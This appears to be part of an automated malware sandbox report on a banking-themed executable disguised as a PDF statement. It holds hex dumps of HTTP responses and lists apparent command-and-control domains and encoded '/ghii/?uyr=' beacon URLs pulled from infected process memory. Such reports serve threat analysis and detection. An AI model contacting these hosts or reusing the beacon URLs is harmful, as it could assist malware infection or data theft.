72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Feb 2023 07:23:35 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Feb 2023 07:23:40 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Feb 2023 07:23:43 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Feb 2023 07:23:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://ladybillplanet.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 79940fb91a5d3621-FRAContent-Encoding: gzipData Raw: 32 33 38 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d db 8e dc 46 96 e0 b3 ea 2b 42 14 4a 95 69 93 4c de f3 56 99 6e 5b 96 dd 5e cb 97 b5 e4 35 ba 65 41 88 24 23 33 a9 62 92 34 23 b2 b2 ca e5 04 fa a1 1f 06 8b 05 e6 61 dc c0 62 d7 33 98 79 58 60 5f 16 e8 dd e9 dd e9 87 de fd 20 cb fd 0f 8b 13 11 64 92 99 cc 4b 55 49 c6 60 ac 12 54 45 46 9c 5b 9c 38 71 e2 c4 95 a7 77 df ff ec c1 93 df 7c fe 10 4d d9 2c 1a 1e 9d c2 1f 14 e1 78 32 50 ce 12 ed e3 2f 14 48 23 38 18 1e dd 39 9d 11 86 91 3f c5 19 25 6c a0 7c f9 e4 03 ad a3 14 e9 31 9e 91 c1 49 96 8c 12 46 4f 90 9f c4 8c c4 6c 70 12 27 61 1c 90 0b 15 8d 93 28 4a 16 27 a8 35 3c 2a 21 28 e7 21 59 a4 49 c6 94 02 45 59 84 01 9b 0e 02 72 1e fa 44 e3 2f 2a 0a e3 90 85 38 d2 a8 8f 23 32 30 39 db bb 9a 86 9e 4c 43 8a 68 c8 08 0a 29 4a 52 16 ce c2 6f 49 80 16 21 9b 22 36 25 e8 37 09 a6 0c 3d 7e f8 19 4a a3 f9 24 8c d1 b9 65 e8 26 d2 d0 94 b1 94 f6 5a ad 4b 00 d0 fd 64 d6 5a 24 59 90 66 84 d2 96 00 a5 2d 4a 92 16 d2 34 e0 c5 42 16 91 e1 e7 78 42 50 9c 30 34 4e e6 71 80 34 f4 e3 ff fa bf 3f fd e3 0f e8 c7 ff f9 a7 1f ff f8 07 f4 f2 6f 7f ff d3 7f fd dd 4f 7f ff a7 d3 96 80 cf 75 93 66 49 4a 32 76 39 50 92 49 2f 4a a0 0c a5 f2 9e 25 cf 3f fe 42 01 c5 d4 81 73 4a 25 e8 43 65 d8 4a 10 b4 f5 1c 94 5f 22 ba 9b 06 f5 b3 30 65 88 5d a6 64 a0 e0 34 8d 42 1f b3 30 89 5b 51 f0 f6 0b 9a c4 0a f2 23 4c e9 40 e1 ca d4 a8 3f 25 33 ac 4d 32 9c 4e 95 e1 95 f2 2b ce e6 82 29 3d 25 d7 ba 00 d1 93 6c a2 a8 ca af 04 64 ef e9 95 f2 2b e0 a1 f4 94 af c8 e8 71 c8 08 64 86 41 09 2f c2 c1 e5 28 8c a2 34 c2 31 11 d5 76 6f 41 46 54 c0 ce b3 68 37 ac a2 2a bc e0 bd ad 05 56 95 80 88 e2 86 49 0c 70 7f f9 1f e8 af 7f f8 fd 4f ff e5 fb bf fe e1 87 5c d5 2f ff f8 b7 39 e6 4f ff f8 87 97 ff fc a7 97 ff ed 2f e8 a7 3f fe bf 9f fe fe f7 3f fd cd 7f 46 3f fd c3 df bc fc 8f df a3 97 7f fe fe e5 3f fd f0 e3 bf fc 59 51 95 34 01 3d 87 38 7a d7 17 84 4b 65 7d 4c 70 e6 4f 65 86 aa 30 9c 4d 08 53 7a 2b 80 87 31 cb 2e 3f 4f c2 98 89 32 3e 21 b3 34 c2 8c ec 2e eb 3b 74 70 45 39 e9 e7 8c 64 b3 e7 94 65 61 3c 59 2a 4b 55 f9 66 4e b2 4b 2d 8c d3 39 d4 49 46 be 99 87 19 09 44 83 dc 44 51 96 cf 54 25 8c 1f e1 78 32 c7 13 e0 2a 1c c3 f2 d9 f2 b4 25 74 95 b7 Data Ascii: 238f}F+BJiLVn[^5eA$#3b4#ab3yX`_ dKUI`TEF[8qw|M,x2P/H#89?%l|1IFOlp'a(J'5<*!(!YIEYrD/*8
          Source: explorer.exe, 00000003.00000002.570167249.0000000015D80000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.00000000059E0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com/ghii/
          Source: explorer.exe, 00000003.00000000.306023557.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.557001836.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/
          Source: cmmon32.exe, 00000004.00000002.557026801.0000000000993000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557026801.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/?uyr=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.comev
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space/ghii/
